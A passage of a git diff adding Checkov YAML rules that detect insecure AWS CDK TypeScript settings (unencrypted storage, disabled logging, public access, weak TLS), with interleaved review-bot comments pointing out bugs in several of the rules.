00000000000..04eb212f8d6 --- /dev/null +++ b/checkov/cdk/checks/typescript/APIGatewayCacheEnable.yaml @@ -0,0 +1,21 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_120 + name: Ensure API Gateway caching is enabled + category: BACKUP_AND_RECOVERY + framework: cdk +scope: + languages: + - typescript +definition: + patterns: + or: + - pattern: new $AWS.Stage() + conditions: + - not_pattern: | + new $AWS.Stage(, { , cacheClusterEnabled: true, } , ) + - pattern: new $AWS.CfnApi() + conditions: + - not_pattern: | + new $AWS.CfnApi(, { , cacheClusterEnabled: true , } , ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/APIGatewayV2AccessLogging.yaml b/checkov/cdk/checks/typescript/APIGatewayV2AccessLogging.yaml new file mode 100644 index 00000000000..5679ad036ff --- /dev/null 
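Review bot: The `regex` on `$AUTH`, `($IMPORT.AuthorizationType.COGNITO|$IMPORT.AuthorizationType.IAM|$IMPORT.AuthorizationType.CUSTOM)`, mixes a metavariable into a regular expression: read as a plain regex, `$` is an end anchor and `.` matches any character, so unless the engine substitutes `$IMPORT` before compiling, the alternation can never match and the exclusion it supports is ineffective. Drop the metavariable and escape the dots, e.g. `regex: AuthorizationType\.(COGNITO|IAM|CUSTOM)$`. The second `or` branch also appears to carry two `conditions:` keys at the same level; with indentation lost in this view I cannot tell whether the second is nested under the `not_pattern` item, but if it is a sibling key a YAML loader keeps only the last one and the `apiKeyRequired: false` exclusion is silently discarded.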
+++ b/checkov/cdk/checks/typescript/APIGatewayV2AccessLogging.yaml @@ -0,0 +1,17 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_95 + name: Ensure API Gateway V2 has Access Logging enabled + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.$FUNC() + conditions: + - not_pattern: | + new $AWS.$FUNC(, { , accessLogSettings: {, destinationArn: $ARG ,} ,}, ) + - metavariable: $FUNC + regex: (CfnStage|CfnApi) diff --git a/checkov/cdk/checks/typescript/APIGatewayXray.yaml b/checkov/cdk/checks/typescript/APIGatewayXray.yaml new file mode 100644 index 00000000000..209216a38e5 --- /dev/null +++ b/checkov/cdk/checks/typescript/APIGatewayXray.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_73 + name: Ensure API Gateway has X-Ray Tracing enabled + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnStage() + conditions: + - not_pattern: | + new $AWS.CfnStage(, {, tracingEnabled: true, }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/AmazonMQBrokerPublicAccess.yaml b/checkov/cdk/checks/typescript/AmazonMQBrokerPublicAccess.yaml new file mode 100644 index 00000000000..b08963b272a --- /dev/null +++ b/checkov/cdk/checks/typescript/AmazonMQBrokerPublicAccess.yaml @@ -0,0 +1,13 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_69 + name: Ensure Amazon MQ Broker should not have public access + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - typescript +definition: + pattern: | + new $AWS.CfnBroker(, { , publiclyAccessible: true, }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/AppSyncFieldLevelLogs.yaml b/checkov/cdk/checks/typescript/AppSyncFieldLevelLogs.yaml new file mode 100644 index 00000000000..0aff8f2674e --- /dev/null +++ b/checkov/cdk/checks/typescript/AppSyncFieldLevelLogs.yaml 
@@ -0,0 +1,22 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_194 + name: Ensure AppSync has Field-Level logs enabled + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: | + const $logConfig: $IMPORT.LogConfig = { }; + conditions: + - not_pattern: | + new $IMPORT.GraphqlApi(, , { , logConfig: $ARG}); + - not_pattern: | + const $LOG: $IMPORT.LogConfig = { FieldLogLevel: $ARG }; + + new $IMPORT.GraphqlApi(, , { , $LOG}); + - metavariable: $ARG + regex: (ERROR|ALL) diff --git a/checkov/cdk/checks/typescript/AppSyncLogging.yaml b/checkov/cdk/checks/typescript/AppSyncLogging.yaml new file mode 100644 index 00000000000..43818592ff3 --- /dev/null +++ b/checkov/cdk/checks/typescript/AppSyncLogging.yaml @@ -0,0 +1,20 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_193 + name: Ensure AppSync has Logging enabled + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: | + const $logConfig: appsync.LogConfig = { }; + conditions: + - not_pattern: | + new $IMPORT.GraphqlApi(, , { , role: }); + - not_pattern: | + const $LOG: $IMPORT.LogConfig = { role: }; + + new $IMPORT.GraphqlApi(, , { , $LOG}); diff --git a/checkov/cdk/checks/typescript/AthenaWorkgroupConfiguration.yaml b/checkov/cdk/checks/typescript/AthenaWorkgroupConfiguration.yaml new file mode 100644 index 00000000000..763c17ed07f --- /dev/null +++ b/checkov/cdk/checks/typescript/AthenaWorkgroupConfiguration.yaml 
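Review bot: `FieldLogLevel: $ARG` in the second `not_pattern` of AppSyncFieldLevelLogs.yaml uses a capitalised property name, whereas the CDK `LogConfig` interface spells it `fieldLogLevel`; compliant TypeScript would therefore not be matched by the exclusion and would be reported as failing. Change it to `const $LOG: $IMPORT.LogConfig = { fieldLogLevel: $ARG };` and extend the test fixtures with a passing case that uses this form.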
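Review bot: In AppSyncLogging.yaml the top-level pattern `const $logConfig: appsync.LogConfig = { };` hard-codes the `appsync` import alias while its `not_pattern` conditions use `$IMPORT`, so the check only fires for code that imported the module under that exact name and the two sides can bind different modules. Use the same metavariable on both sides: `const $logConfig: $IMPORT.LogConfig = { };`. `ECRImmutableTags.yaml` later in this change has the same issue, pairing `ecr.TagMutability.IMMUTABLE` with `$AWS.Repository`.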
@@ -0,0 +1,20 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_82 + name: Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - typescript +definition: + pattern: | + new $IMPORT.CfnWorkGroup(, , $WORKGROUP ); + conditions: + - not_within: | + const $WORKGROUP: $IMPORT.CfnWorkGroup.WorkGroupConfigurationProperty = { , enforceWorkGroupConfiguration: true, }; + + const $VAR1 = new $IMPORT.CfnWorkGroup(, , $WORKGROUP ); + - not_pattern: | + new $IMPORT.CfnWorkGroup(, , {, enforceWorkGroupConfiguration: true }); diff --git a/checkov/cdk/checks/typescript/AuroraEncryption.yaml b/checkov/cdk/checks/typescript/AuroraEncryption.yaml new file mode 100644 index 00000000000..487e599094a --- /dev/null +++ b/checkov/cdk/checks/typescript/AuroraEncryption.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_96 + name: Ensure all data stored in Aurora is securely encrypted at rest + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnDBCluster() + conditions: + - not_pattern: | + new $AWS.CfnDBCluster(, { , storageEncrypted: true ,}, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/BackupVaultEncrypted.yaml b/checkov/cdk/checks/typescript/BackupVaultEncrypted.yaml new file mode 100644 index 00000000000..7ddfec53f3c --- /dev/null +++ b/checkov/cdk/checks/typescript/BackupVaultEncrypted.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_166 + name: Ensure Backup Vault is encrypted at rest using KMS CMK + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnBackupVault() + conditions: + - not_pattern: | + new $AWS.CfnBackupVault(, { , encryptionKeyArn: $ARG, }, ) \ No newline at end of file 
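Review bot: `category: LOGGING` in BackupVaultEncrypted.yaml looks mismatched for a check titled "Ensure Backup Vault is encrypted at rest using KMS CMK"; unless it intentionally mirrors the category of the existing CKV_AWS_166 check, `category: ENCRYPTION` is what the `encryptionKeyArn` pattern tests. `DMSReplicationInstancePubliclyAccessible.yaml` (CKV_AWS_89) in this change has the reverse problem — `category: ENCRYPTION` on a public-access check, where `NETWORKING` would match its sibling `EC2PublicIP.yaml`.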
diff --git a/checkov/cdk/checks/typescript/CloudFrontTLS12.yaml b/checkov/cdk/checks/typescript/CloudFrontTLS12.yaml new file mode 100644 index 00000000000..9920a4f0a9a --- /dev/null +++ b/checkov/cdk/checks/typescript/CloudFrontTLS12.yaml @@ -0,0 +1,23 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_174 + name: Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: | + new $CF.CfnDistribution(, , $VCP) + conditions: + - not_pattern: | + const $VCP: $CF.CfnDistribution.ViewerCertificateProperty = { minimumProtocolVersion: 'TLSv1.2'}; + + - not_pattern: | + const $PROPS: $CF.CfnDistributionProps = { , viewerCertificate: { , minimumProtocolVersion: 'TLSv1.2' } } + + new CfnDistribution(, $PROPS) + - not_pattern: | + new $CF.CfnDistribution(, , { , viewerCertificate: {, minimumProtocolVersion: 'TLSv1.2'} }) diff --git a/checkov/cdk/checks/typescript/CloudTrailLogValidation.yaml b/checkov/cdk/checks/typescript/CloudTrailLogValidation.yaml new file mode 100644 index 00000000000..b1c584f92a9 --- /dev/null +++ b/checkov/cdk/checks/typescript/CloudTrailLogValidation.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_36 + name: Ensure CloudTrail log file validation is enabled + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnTrail() + conditions: + - not_pattern: | + new $AWS.CfnTrail(, { , enableLogFileValidation: true , }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/CloudWatchLogGroupKMSKey.yaml b/checkov/cdk/checks/typescript/CloudWatchLogGroupKMSKey.yaml new file mode 100644 index 00000000000..0e2120dad3e --- /dev/null +++ b/checkov/cdk/checks/typescript/CloudWatchLogGroupKMSKey.yaml 
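Review bot: The second `not_pattern` in CloudFrontTLS12.yaml writes `new CfnDistribution(, $PROPS)` without the `$CF.` qualifier used by the top-level pattern and the other conditions, so a distribution built from a `CfnDistributionProps` constant through `new $CF.CfnDistribution(...)` is never excluded and is flagged even when it sets TLSv1.2; write `new $CF.CfnDistribution(, $PROPS)`. Separately, every condition accepts only the literal `'TLSv1.2'`, while CloudFront also offers `TLSv1.2_2018`, `TLSv1.2_2019` and `TLSv1.2_2021` as minimum protocol versions, all at least as strict; binding the value to a metavariable with `regex: ^TLSv1\.2` would avoid those false positives.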
@@ -0,0 +1,17 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_158 + name: Ensure that CloudWatch Log Group is encrypted by KMS + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.LogGroup() + conditions: + - not_pattern: | + new $AWS.LogGroup(, {, encryptionKey: new $ENC.Key() , }, ) + - not_pattern: | + new $AWS.LogGroup(, {, encryptionKey: $ARG ,} , ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/CloudWatchLogGroupRetention.yaml b/checkov/cdk/checks/typescript/CloudWatchLogGroupRetention.yaml new file mode 100644 index 00000000000..a134443051d --- /dev/null +++ b/checkov/cdk/checks/typescript/CloudWatchLogGroupRetention.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_66 + name: Ensure that CloudWatch Log Group specifies retention days + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnLogGroup() + conditions: + - not_pattern: | + new $AWS.CfnLogGroup(, {, retentionInDays: $NUM , } , ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/CloudfrontDistributionEncryption.yaml b/checkov/cdk/checks/typescript/CloudfrontDistributionEncryption.yaml new file mode 100644 index 00000000000..72beacecaf8 --- /dev/null +++ b/checkov/cdk/checks/typescript/CloudfrontDistributionEncryption.yaml @@ -0,0 +1,17 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_34 + name: Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + patterns: + or: + - pattern: | + new $AWS.CfnDistribution(, {distributionConfig: {, defaultCacheBehavior: {, viewerProtocolPolicy: 'allow-all' , } , }, ) + - pattern: | + new $AWS.Distribution(, {, defaultBehavior: {, viewerProtocolPolicy: $AWS.ViewerProtocolPolicy.ALLOW_ALL ,} , },) \ No newline at end of file 
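Review bot: In CloudWatchLogGroupKMSKey.yaml the first `not_pattern`, `encryptionKey: new $ENC.Key()`, is presumably subsumed by the second, `encryptionKey: $ARG`, since a metavariable should also bind a constructor expression; if so, keeping only the `$ARG` form shortens the check without changing results, and if the engine does not bind `new` expressions to a metavariable that is worth a comment on the first condition. `CodeBuildProjectEncryption.yaml` in this change repeats the same pair.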
diff --git a/checkov/cdk/checks/typescript/CloudfrontDistributionLogging.yaml b/checkov/cdk/checks/typescript/CloudfrontDistributionLogging.yaml new file mode 100644 index 00000000000..fe3592d88f1 --- /dev/null +++ b/checkov/cdk/checks/typescript/CloudfrontDistributionLogging.yaml @@ -0,0 +1,21 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_86 + name: Ensure CloudFront distribution has Access Logging enabled + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + patterns: + or: + - pattern: new $AWS.Distribution() + conditions: + - not_pattern: | + new $AWS.Distribution(, {, enableLogging: true ,} ,) + - pattern: new $AWS.CfnDistribution() + conditions: + - not_pattern: | + new $AWS.CfnDistribution(, {, distributionConfig: {, logging: {, bucket: $ARG ,} ,} ,} , ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/CloudtrailEncryption.yaml b/checkov/cdk/checks/typescript/CloudtrailEncryption.yaml new file mode 100644 index 00000000000..8af99d0ec08 --- /dev/null +++ b/checkov/cdk/checks/typescript/CloudtrailEncryption.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_35 + name: Ensure CloudTrail logs are encrypted at rest using KMS CMKs + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnTrail() + conditions: + - not_pattern: | + new $AWS.CfnTrail(, {, kmsKeyId: $ARG, } ,) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/CloudtrailMultiRegion.yaml b/checkov/cdk/checks/typescript/CloudtrailMultiRegion.yaml new file mode 100644 index 00000000000..e894f867401 --- /dev/null +++ b/checkov/cdk/checks/typescript/CloudtrailMultiRegion.yaml 
@@ -0,0 +1,21 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_67 + name: Ensure CloudTrail is enabled in all Regions + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + patterns: + or: + - pattern: new $AWS.Trail() + conditions: + - not_pattern: | + new $AWS.Trail(, {, isMultiRegionTrail: true, } ,) + - pattern: new $AWS.CfnTrail() + conditions: + - not_pattern: | + new $AWS.CfnTrail(, {, isMultiRegionTrail: true, } ,) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/CodeBuildProjectEncryption.yaml b/checkov/cdk/checks/typescript/CodeBuildProjectEncryption.yaml new file mode 100644 index 00000000000..dc016135315 --- /dev/null +++ b/checkov/cdk/checks/typescript/CodeBuildProjectEncryption.yaml @@ -0,0 +1,17 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_78 + name: Ensure that CodeBuild Project encryption is not disabled + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.Project() + conditions: + - not_pattern: | + new $AWS.Project(, {, encryptionKey: new $ENC.Key() ,} , ) + - not_pattern: | + new $AWS.Project(, {, encryptionKey: $ARG ,} , ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/DAXEncryption.yaml b/checkov/cdk/checks/typescript/DAXEncryption.yaml new file mode 100644 index 00000000000..a7ad6517855 --- /dev/null +++ b/checkov/cdk/checks/typescript/DAXEncryption.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_47 + name: Ensure DAX is encrypted at rest (default is unencrypted) + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnCluster() + conditions: + - not_pattern: | + new $AWS.CfnCluster(, {, sseSpecification: {, enabled: true ,} ,} , ) \ No newline at end of file 
diff --git a/checkov/cdk/checks/typescript/DMSReplicationInstancePubliclyAccessible.yaml b/checkov/cdk/checks/typescript/DMSReplicationInstancePubliclyAccessible.yaml new file mode 100644 index 00000000000..ce486d4ab4d --- /dev/null +++ b/checkov/cdk/checks/typescript/DMSReplicationInstancePubliclyAccessible.yaml @@ -0,0 +1,13 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_89 + name: DMS replication instance should not be publicly accessible + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: | + new $AWS.CfnReplicationInstance(, {, publiclyAccessible: true, }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/DocDBAuditLogs.yaml b/checkov/cdk/checks/typescript/DocDBAuditLogs.yaml new file mode 100644 index 00000000000..050f6916c32 --- /dev/null +++ b/checkov/cdk/checks/typescript/DocDBAuditLogs.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_104 + name: Ensure DocumentDB has audit logs enabled + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnDBClusterParameterGroup() + conditions: + - not_pattern: | + new $AWS.CfnDBClusterParameterGroup(, {, parameters: {, audit_logs: 'enabled' ,}, } , ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/DocDBEncryption.yaml b/checkov/cdk/checks/typescript/DocDBEncryption.yaml new file mode 100644 index 00000000000..dc76185a1c0 --- /dev/null +++ b/checkov/cdk/checks/typescript/DocDBEncryption.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_74 + name: Ensure DocumentDB is encrypted at rest (default is unencrypted) + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnDBCluster() + conditions: + - not_pattern: | + new $AWS.CfnDBCluster(, {, storageEncrypted: true, } , ) \ No newline at end of file 
diff --git a/checkov/cdk/checks/typescript/DocDBTLS.yaml b/checkov/cdk/checks/typescript/DocDBTLS.yaml new file mode 100644 index 00000000000..68a74e0c6f0 --- /dev/null +++ b/checkov/cdk/checks/typescript/DocDBTLS.yaml @@ -0,0 +1,13 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_90 + name: Ensure DocumentDB TLS is not disabled + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: | + new $AWS.CfnDBClusterParameterGroup(, {, parameters: {, tls: 'disabled' ,}, } ,) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/DynamodbGlobalTableRecovery.yaml b/checkov/cdk/checks/typescript/DynamodbGlobalTableRecovery.yaml new file mode 100644 index 00000000000..5c21a342632 --- /dev/null +++ b/checkov/cdk/checks/typescript/DynamodbGlobalTableRecovery.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_165 + name: Ensure DynamoDB global table point in time recovery (backup) is enabled + category: BACKUP_AND_RECOVERY + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnGlobalTable() + conditions: + - not_pattern: | + new $AWS.CfnGlobalTable(, {, pointInTimeRecoverySpecification: {, pointInTimeRecoveryEnabled: true ,} ,} , ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/DynamodbRecovery.yaml b/checkov/cdk/checks/typescript/DynamodbRecovery.yaml new file mode 100644 index 00000000000..2dcf8615fd8 --- /dev/null +++ b/checkov/cdk/checks/typescript/DynamodbRecovery.yaml 
@@ -0,0 +1,21 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_28 + name: Ensure DynamoDB point-in-time recovery (backup) is enabled + category: BACKUP_AND_RECOVERY + framework: cdk +scope: + languages: + - typescript +definition: + patterns: + or: + - pattern: new $AWS.CfnTable() + conditions: + - not_pattern: | + new $AWS.CfnTable(, {, pointInTimeRecoverySpecification: {, pointInTimeRecoveryEnabled: true ,} ,} , ) + - pattern: new $AWS.Table() + conditions: + - not_pattern: | + new $AWS.Table(, {, pointInTimeRecovery: true ,} ,) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/EBSEncryption.yaml b/checkov/cdk/checks/typescript/EBSEncryption.yaml new file mode 100644 index 00000000000..6a518cdfc6d --- /dev/null +++ b/checkov/cdk/checks/typescript/EBSEncryption.yaml @@ -0,0 +1,21 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_3 + name: Ensure all data stored in the EBS is securely encrypted + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + patterns: + or: + - pattern: new $AWS.Volume() + conditions: + - not_pattern: | + new $AWS.Volume(, {, encrypted: true ,} , ) + - pattern: new $AWS.CfnVolume() + conditions: + - not_pattern: | + new $AWS.CfnVolume(, {, encrypted: true ,} , ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/EC2PublicIP.yaml b/checkov/cdk/checks/typescript/EC2PublicIP.yaml new file mode 100644 index 00000000000..be5d5e7f157 --- /dev/null +++ b/checkov/cdk/checks/typescript/EC2PublicIP.yaml @@ -0,0 +1,17 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_88 + name: EC2 instance should not have public IP + category: NETWORKING + framework: cdk +scope: + languages: + - typescript +definition: + patterns: + or: + - pattern: | + new $AWS.Instance(, { , associatePublicIpAddress: true, }, ) + - pattern: | + new $AWS.LaunchTemplate(, { , associatePublicIpAddress: true, }, ) \ No newline at end of file 
diff --git a/checkov/cdk/checks/typescript/ECRImageScanning.yaml b/checkov/cdk/checks/typescript/ECRImageScanning.yaml new file mode 100644 index 00000000000..64bd6009720 --- /dev/null +++ b/checkov/cdk/checks/typescript/ECRImageScanning.yaml @@ -0,0 +1,16 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_163 + name: Ensure ECR image scanning on push is enabled + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - typescript +definition: + pattern: | + new $AWS.Repository() + conditions: + - not_pattern: | + new $AWS.Repository(, { , imageScanOnPush: true, }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/ECRImmutableTags.yaml b/checkov/cdk/checks/typescript/ECRImmutableTags.yaml new file mode 100644 index 00000000000..c7439ef8d96 --- /dev/null +++ b/checkov/cdk/checks/typescript/ECRImmutableTags.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_51 + name: Ensure ECR Image Tags are immutable + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.Repository() + conditions: + - not_pattern: | + new $AWS.Repository(, { , imageTagMutability: ecr.TagMutability.IMMUTABLE, }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/ECRRepositoryEncrypted.yaml b/checkov/cdk/checks/typescript/ECRRepositoryEncrypted.yaml new file mode 100644 index 00000000000..da883d97214 --- /dev/null +++ b/checkov/cdk/checks/typescript/ECRRepositoryEncrypted.yaml 
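Review bot: The not_pattern in ECRImmutableTags.yaml hard-codes the import alias in `imageTagMutability: ecr.TagMutability.IMMUTABLE` while the pattern binds the module as `$AWS.Repository`, so a stack that imports the module under any other name fails the exclusion and is reported even though its tags are immutable. Use the same metavariable on both sides: `new $AWS.Repository(, { , imageTagMutability: $AWS.TagMutability.IMMUTABLE, }, )`. ECRImageScanning.yaml above matches `new $AWS.Repository()` with no module constraint, so other `Repository` constructs (CodeCommit, for one) may be flagged for a missing `imageScanOnPush`; a fixture with a non-ECR repository would settle that.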
@@ -0,0 +1,17 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_136 + name: Ensure that ECR repositories are encrypted using KMS + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.Repository() + conditions: + - not_pattern: | + new $ECR.Repository(, { , encryption: $ECR.RepositoryEncryption.KMS, }, ) + - not_pattern: | + new $ECR.Repository(, { , encryptionKey: new $KMS.Key(), }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/ECSClusterContainerInsights.yaml b/checkov/cdk/checks/typescript/ECSClusterContainerInsights.yaml new file mode 100644 index 00000000000..18cdca5ff4e --- /dev/null +++ b/checkov/cdk/checks/typescript/ECSClusterContainerInsights.yaml @@ -0,0 +1,16 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_65 + name: Ensure container insights are enabled on ECS cluster + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: | + new ecs.Cluster() + conditions: + - not_pattern: | + new $AWS.Cluster(, { , containerInsights: true, }, ) diff --git a/checkov/cdk/checks/typescript/ECSTaskDefinitionEFSVolumeEncryption.yaml b/checkov/cdk/checks/typescript/ECSTaskDefinitionEFSVolumeEncryption.yaml new file mode 100644 index 00000000000..b8b0187fde0 --- /dev/null +++ b/checkov/cdk/checks/typescript/ECSTaskDefinitionEFSVolumeEncryption.yaml @@ -0,0 +1,17 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_97 + name: Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: | + new $AWS.$FUNC(, {, volumes: [, {, efsVolumeConfiguration: {, transitEncryption: "DISABLED", }, },],}) + conditions: + or: + - metavariable: $FUNC + regex: (TaskDefinition|Ec2TaskDefinition|FargateTaskDefinition|ExternalTaskDefinition) 
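Review bot: ECRRepositoryEncrypted.yaml binds the module as `$AWS` in the pattern but as `$ECR` in both not_patterns; whether a fresh metavariable in an exclusion unifies with the match depends on the engine, and using `$AWS` throughout removes the doubt. The second exclusion only recognises an inline `encryptionKey: new $KMS.Key()`, so the usual form of passing an existing key (`encryptionKey: key`) is still reported; `encryptionKey: $KEY` covers both. The `\ No newline at end of file` marker can go as well.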
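Review bot: The pattern in ECSClusterContainerInsights.yaml hard-codes `new ecs.Cluster()` while its not_pattern uses `$AWS.Cluster`, the reverse of the rest of the set; a stack that imports the module under another alias is never matched at all, so the check silently passes for it. Change the pattern to `new $AWS.Cluster()` so both lines bind the same metavariable. In ECSTaskDefinitionEFSVolumeEncryption.yaml the `conditions: or:` wrapper holds a single metavariable entry; the plain list form used by the other files would be clearer.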
diff --git a/checkov/cdk/checks/typescript/EFSEncryptionEnabled.yaml b/checkov/cdk/checks/typescript/EFSEncryptionEnabled.yaml new file mode 100644 index 00000000000..02a98a1aebe --- /dev/null +++ b/checkov/cdk/checks/typescript/EFSEncryptionEnabled.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_42 + name: Ensure EFS is securely encrypted + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.FileSystem() + conditions: + - not_pattern: | + new $AWS.FileSystem(, { , encrypted: true, }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/EKSSecretsEncryption.yaml b/checkov/cdk/checks/typescript/EKSSecretsEncryption.yaml new file mode 100644 index 00000000000..ec0daf396e4 --- /dev/null +++ b/checkov/cdk/checks/typescript/EKSSecretsEncryption.yaml @@ -0,0 +1,16 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_58 + name: Ensure EKS Cluster has Secrets Encryption Enabled + category: KUBERNETES + framework: cdk +scope: + languages: + - typescript +definition: + pattern: | + new $AWS.CfnCluster() + conditions: + - not_pattern: | + new $AWS.CfnCluster(, {, encryptionConfig: [, { , resources: ['secrets'], }, ], }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/ELBAccessLogs.yaml b/checkov/cdk/checks/typescript/ELBAccessLogs.yaml new file mode 100644 index 00000000000..e75437b7188 --- /dev/null +++ b/checkov/cdk/checks/typescript/ELBAccessLogs.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_92 + name: Ensure the ELB has access logging enabled + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.LoadBalancer() + conditions: + - not_pattern: | + new $AWS.LoadBalancer(, {, accessLoggingPolicy: {, enabled: true, } ,}) \ No newline at end of file 
diff --git a/checkov/cdk/checks/typescript/ELBv2AccessLogs.yaml b/checkov/cdk/checks/typescript/ELBv2AccessLogs.yaml new file mode 100644 index 00000000000..2e28a64a11c --- /dev/null +++ b/checkov/cdk/checks/typescript/ELBv2AccessLogs.yaml @@ -0,0 +1,17 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_91 + name: Ensure the ELBv2 (Application/Network) has access logging enabled + category: LOGGING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: const $ELB = new $AWS.ApplicationLoadBalancer(); + conditions: + - not_within: | + const $ELB = new $AWS.ApplicationLoadBalancer() + + $ELB.logAccessLogs() diff --git a/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtRest.yaml b/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtRest.yaml new file mode 100644 index 00000000000..b1d041ea66a --- /dev/null +++ b/checkov/cdk/checks/typescript/ElasticacheReplicationGroupEncryptionAtRest.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_29 + name: Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnReplicationGroup() + conditions: + - not_pattern: | + new $AWS.CfnReplicationGroup(, {, 